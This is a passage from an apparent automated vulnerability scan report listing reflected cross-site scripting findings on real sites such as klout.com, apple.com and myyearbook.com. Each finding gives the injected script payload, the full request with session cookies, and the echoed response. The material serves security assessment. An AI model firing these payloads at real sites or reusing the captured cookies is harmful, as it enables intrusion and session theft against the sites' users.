The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload d539f%0acb95731872f was submitted in the site parameter. This input was echoed as d539f
cb95731872f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /visitor/addons/deploy2.asp?site=54909046d539f%0acb95731872f&d_id=ndb-sales&default=simpleDeploy HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 14079
Cache-Control: public, max-age=3600
Date: Fri, 22 Jul 2011 20:32:10 GMT
Connection: close

//Plugins for site 54909046d539f
cb95731872f
lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=
...[SNIP]...

3.91. http://syn.5min.com/handlers/SenseHandler.ashx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syn.5min.com
Path:	/handlers/SenseHandler.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ae349<script>alert(1)</script>d4acfa4c84b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /handlers/SenseHandler.ashx?func=GetResults&thumbSeedCounter=0&sid=768&categories=6%2C5%2C8%2C4%2C13%2C2%2C14&fallback=0&fallbackType=featured&textLocation=1&thumbnailSize=0&width=468&height=200&NumOfColumnsAsked=3&NumOfRowsAsked=1&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&isnewts=true&callback=FIVEMIN.RequestManager.callbacks[71787]&ae349<script>alert(1)</script>d4acfa4c84b=1 HTTP/1.1
Host: syn.5min.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Server: fmv-m06 - syn
Date: Thu, 21 Jul 2011 19:24:43 GMT
Content-Length: 50062

FIVEMIN.RequestManager.callbacks[71787]({"binding":[{"ID":338597705,"Title":"Helping Adults with ADHD Become More Organized","WrapTitle":"Helping Adults with ADHD Become More Organized","ThumbURL":"ht
...[SNIP]...
52fHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%253futm_source%253doutbrain%2526utm_medium%253dcpc%2526utm_campaign%253dADHD_Adult&isnewts=true&callback=FIVEMIN.RequestManager.callbacks%255b71787%255d&ae349<script>alert(1)</script>d4acfa4c84b=1&endUrl=1&logvCQ=4&logmId=110165741&logvGeo=0&logvExp=2147483647&logsKey=1&logvf=0&endUrlLog=1","IsFlagged":false,"mId":110165741,"vCat":260,"vCQ":4,"vExp":2147483647,"vGeo":0,"vf":0,"vFlg":0},{"ID":
...[SNIP]...

3.92. http://widgets.klout.com/ [from parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.klout.com
Path:	/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f63"><script>alert(1)</script>22ad580a563 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?from=ks99f63"><script>alert(1)</script>22ad580a563 HTTP/1.1
Host: widgets.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.5.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:07 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 17995
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bringing Influen
...[SNIP]...
<a href="http://klout.com/auth/login?prev_page=http://widgets.klout.com/?from=ks99f63"><script>alert(1)</script>22ad580a563">
...[SNIP]...

3.93. http://widgets.klout.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.klout.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7db0"><script>alert(1)</script>00158fd2c7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?from=ks&a7db0"><script>alert(1)</script>00158fd2c7d=1 HTTP/1.1
Host: widgets.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.5.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:07 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 18001
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bringing Influen
...[SNIP]...
<a href="http://klout.com/auth/login?prev_page=http://widgets.klout.com/?from=ks&a7db0"><script>alert(1)</script>00158fd2c7d=1">
...[SNIP]...

3.94. http://www.apple.com/global/scripts/search_featured.php [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.apple.com
Path:	/global/scripts/search_featured.php

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 13c5d<a>52f5b9de88c was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /global/scripts/search_featured.php?q=xss13c5d<a>52f5b9de88c&section=global&geo=us HTTP/1.1
Host: www.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/search/?q=xss
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D; ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; geo=US

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix)
ntCoent-Length: 91
Content-Type: text/xml
Content-Length: 91
Vary: Accept-Encoding
Cache-Control: max-age=579
Expires: Thu, 21 Jul 2011 20:57:03 GMT
Date: Thu, 21 Jul 2011 20:47:24 GMT
Connection: close

<shortcuts><term>xss13c5d<a>52f5b9de88c</term><search_results></search_results></shortcuts>

3.95. http://www.lijit.com/delivery/fp [n parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/fp

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37c7d"%3balert(1)//5cbd0c080c3 was submitted in the n parameter. This input was echoed as 37c7d";alert(1)//5cbd0c080c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/fp?u=curse&z=125814&n=137c7d"%3balert(1)//5cbd0c080c3 HTTP/1.1
Host: www.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html
Cookie: ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; ljtrtb=eJyrVjJUslIyMTQxMzUxMTI0MDSwMDYzNDI1U6oFAE8JBbs%3D

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 04:49:31 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n28 ( iad-agg-n5), ms iad-agg-n5 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Sat, 23 Jul 2011 06:49:31 GMT
Age: 0
Content-Length: 15044
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive

function LjtAds_ReportError(errorMsg, except){
   try{
       errorMsg = "[Ads JS] "+ errorMsg
       try{
           errorMsg += " - "+ except.message
       } catch(e){}
       errorMsg = encodeURIComponent(errorMsg);

       var s
...[SNIP]...
get Time String', e);
       return "00:00:00";
   }
}

try{
   // Settings: Change these values on a per user basis
   var lwp_ad_username = "curse";
   var lwp_ad_zoneid = ljt_getZoneID();
   var lwp_ad_numads = "137c7d";alert(1)//5cbd0c080c3";
   var lwp_ad_premium = "1";// or 0 for non-premium ad
   var lwp_ad_eleid = "lijit_region_125814";
   var lwp_method = "regex";
   var lwp_referring_search = getReferringSearch(document.referrer);

   var l
...[SNIP]...

3.96. http://www.myyearbook.com/advertising/default.php [n parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3248a</script><script>alert(1)</script>30706a77c6b was submitted in the n parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertising/default.php?n=TribalFusion3248a</script><script>alert(1)</script>30706a77c6b&section=None&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:41 GMT
Server: Apache
X-Server-Name: web10
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.245

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion3248a</script><script>alert(1)</script>30706a77c6b_MYB_728x90_None_Network");
</script>
...[SNIP]...

3.97. http://www.myyearbook.com/advertising/default.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f145c</script><script>alert(1)</script>43acc39f631 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Net/f145c</script><script>alert(1)</script>43acc39f631work HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:43 GMT
Server: Apache
X-Server-Name: web54
Content-Length: 890
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.121

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90_None_Net/f145c</script><script>alert(1)</script>43acc39f631work");
</script>
...[SNIP]...

3.98. http://www.myyearbook.com/advertising/default.php [section parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84675</script><script>alert(1)</script>7ee31c862b0 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertising/default.php?n=TribalFusion&section=None84675</script><script>alert(1)</script>7ee31c862b0&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:41 GMT
Server: Apache
X-Server-Name: web16-new
Content-Length: 938
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.4

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90_None84675</script><script>alert(1)</script>7ee31c862b0_Network");
</script>
...[SNIP]...

3.99. http://www.myyearbook.com/advertising/default.php [section parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d66ee</script><script>alert(1)</script>0f8920e32d5 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertising/default.php?n=TribalFusion&section=Noned66ee</script><script>alert(1)</script>0f8920e32d5&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:41 GMT
Server: Apache
X-Server-Name: web25
Content-Length: 938
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.74

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddAttr('Section','Noned66ee</script><script>alert(1)</script>0f8920e32d5');
</script>
...[SNIP]...

3.100. http://www.myyearbook.com/advertising/default.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d38c9</script><script>alert(1)</script>c625e2bc1cf was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYBd38c9</script><script>alert(1)</script>c625e2bc1cf&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:42 GMT
Server: Apache
X-Server-Name: web63
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.213

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYBd38c9</script><script>alert(1)</script>c625e2bc1cf_728x90_None_Network");
</script>
...[SNIP]...

3.101. http://www.myyearbook.com/advertising/default.php [size parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The value of the size request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 301ff</script><script>alert(1)</script>e2929316508 was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90301ff</script><script>alert(1)</script>e2929316508&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:42 GMT
Server: Apache
X-Server-Name: web62
